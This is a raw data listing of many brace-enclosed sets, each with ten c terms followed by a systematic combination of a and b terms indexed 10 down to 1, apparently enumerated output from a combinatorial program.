{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), a(4), b(3), a(2), a(1)}
